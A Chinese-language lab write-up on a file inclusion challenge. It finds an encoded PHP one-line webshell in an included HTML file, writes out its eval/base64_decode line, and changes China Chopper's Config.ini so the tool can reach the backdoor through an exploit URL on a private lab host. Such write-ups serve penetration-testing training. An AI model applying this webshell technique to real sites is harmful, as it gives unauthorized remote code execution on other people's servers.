一个文件包含漏洞(需要利用菜刀原理)

一个文件包含漏洞(需要利用菜刀原理)

1.任务

通过你所学到的知识,测试该网站可能存在的包含漏洞,尝试获取webshell。

一个文件包含漏洞(需要利用菜刀原理)_第1张图片

2.分析

直接访问它包含的文件:http://192.168.223.134/test/md3oa/vulnerabilities/view.html

一个文件包含漏洞(需要利用菜刀原理)_第2张图片一个文件包含漏洞(需要利用菜刀原理)_第3张图片

查看view.html可以看到这里有一段PHP代码,取出来如下:

一个文件包含漏洞(需要利用菜刀原理)_第4张图片

上面代码解码后如下:

一个文件包含漏洞(需要利用菜刀原理)_第5张图片

3.菜刀原理与利用

这是一个非常经典的一句话木马,假设它已经上传:

现在使用菜刀去连接,在菜刀配置好代理,代理配置如下:

一个文件包含漏洞(需要利用菜刀原理)_第6张图片

Burp抓取数据包如下:

一个文件包含漏洞(需要利用菜刀原理)_第7张图片

上面cmd的值,action名称以及值都是来菜刀配置文件Config.ini,如下:

一个文件包含漏洞(需要利用菜刀原理)_第8张图片一个文件包含漏洞(需要利用菜刀原理)_第9张图片

后台一句话木马最终执行:

@eval(@eval(base64_decode($_POST[action]));)

而2中:

一个文件包含漏洞(需要利用菜刀原理)_第10张图片

只需要把action修改为z0,并且Hello有值,如下是成功的:

一个文件包含漏洞(需要利用菜刀原理)_第11张图片

现在修改菜刀配置文件Config.ini。

一个文件包含漏洞(需要利用菜刀原理)_第12张图片一个文件包含漏洞(需要利用菜刀原理)_第13张图片

修改菜刀后面参数:

一个文件包含漏洞(需要利用菜刀原理)_第14张图片

Burp抓包,发现修改成功,如下所示:

一个文件包含漏洞(需要利用菜刀原理)_第15张图片

现在断开代理,直接用菜刀连接:

http://192.168.223.134/test/md3oa/vulnerabilities/fu1.php?file=view.html

一个文件包含漏洞(需要利用菜刀原理)_第16张图片

你可能感兴趣的:(渗透测试)